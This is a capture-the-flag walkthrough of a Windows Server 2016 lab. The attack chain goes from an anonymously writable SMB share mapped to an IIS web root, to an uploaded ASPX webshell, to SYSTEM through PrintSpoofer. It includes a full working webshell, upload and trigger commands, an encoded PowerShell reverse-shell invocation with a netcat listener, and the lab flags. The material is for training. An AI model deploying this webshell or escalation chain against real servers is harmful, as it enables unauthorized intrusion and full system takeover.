Overview
Windows Server 2016 with an SMB share (nt4wrksv) that allows anonymous write access — and is mapped directly to the IIS web root on port 49663. Upload an ASPX webshell via SMB, get code execution as IIS AppPool, then escalate to SYSTEM via SeImpersonatePrivilege + PrintSpoofer.
SMB Enum → Anonymous Write (nt4wrksv) → IIS Webroot Mapping Found
→ ASPX Webshell Upload via SMB → RCE as IIS AppPool
→ SeImpersonatePrivilege → PrintSpoofer → SYSTEM
Reconnaissance
Port Scan
nmap -sC -sV -T4 TARGET| Port | Service | Notes |
|---|---|---|
| 80/tcp | IIS 10.0 | Default IIS page |
| 135/tcp | MSRPC | Standard |
| 139/tcp | NetBIOS | SMB discovery |
| 445/tcp | SMB | Windows Server 2016 |
| 3389/tcp | RDP | Remote Desktop |
| 49663/tcp | IIS 10.0 | Second IIS instance — serves SMB share |
SMB Enumeration
smbclient -L //TARGET/ -N
ADMIN$ IPC$ C$ nt4wrksvnt4wrksv is accessible anonymously. Contains passwords.txt (base64 decoys) and allows write access.
Critical Discovery
The nt4wrksv share is mapped to the IIS webroot at http://TARGET:49663/nt4wrksv/. Files written via SMB are directly served over HTTP — webshell upload path confirmed.
Foothold — ASPX Webshell
Webshell Creation
<%@ Page Language="C#" %>
<%@ Import Namespace="System.Diagnostics" %>
<%
string cmd = Request["cmd"];
Process p = new Process();
p.StartInfo.FileName = "cmd.exe";
p.StartInfo.Arguments = "/c " + cmd;
p.StartInfo.UseShellExecute = false;
p.StartInfo.RedirectStandardOutput = true;
p.Start();
Response.Write("<pre>" + p.StandardOutput.ReadToEnd() + "</pre>");
%>Upload via SMB
smbclient //TARGET/nt4wrksv -N -c "put shell.aspx"Verify RCE
curl "http://TARGET:49663/nt4wrksv/shell.aspx?cmd=whoami"iis apppool\defaultapppool USER: THM{fdk4ka34vk346ksxfr21tg789ktf45}
Privilege Escalation
SeImpersonatePrivilege
?cmd=whoami /priv
SeImpersonatePrivilege EnabledImpersonation → SYSTEM
SeImpersonatePrivilege on Windows IIS/service accounts allows token impersonation. PrintSpoofer abuses the print spooler service to escalate to SYSTEM.
PrintSpoofer Upload & Execution
# Upload via SMB
smbclient //TARGET/nt4wrksv -N -c "put PrintSpoofer64.exe"
# Listener
nc -lvnp 4444
# Trigger via webshell
?cmd=C:\inetpub\wwwroot\nt4wrksv\PrintSpoofer64.exe -i -c "cmd /c powershell -e <B64_REVSHELL>"Result: SYSTEM shell received on listener
type C:\Users\Administrator\Desktop\root.txt ROOT: THM{1fk5kf469devly1gl320zafgl345pv}
Lessons Learned
- Anonymous SMB write + web-served share = instant webshell. Always check if SMB shares map to web-accessible directories.
- SeImpersonatePrivilege = SYSTEM. On Windows service accounts (IIS, MSSQL, etc.), this privilege enables PrintSpoofer, JuicyPotato, or RoguePotato for guaranteed escalation.
- Check all ports. The second IIS instance on 49663 was the actual attack surface, not port 80.
Tools Used
| Tool | Purpose |
|---|---|
| nmap | Port scanning & service detection |
| smbclient | SMB enumeration & file upload |
| curl | Webshell interaction |
| PrintSpoofer64 | SeImpersonatePrivilege → SYSTEM |
| netcat | Reverse shell listener |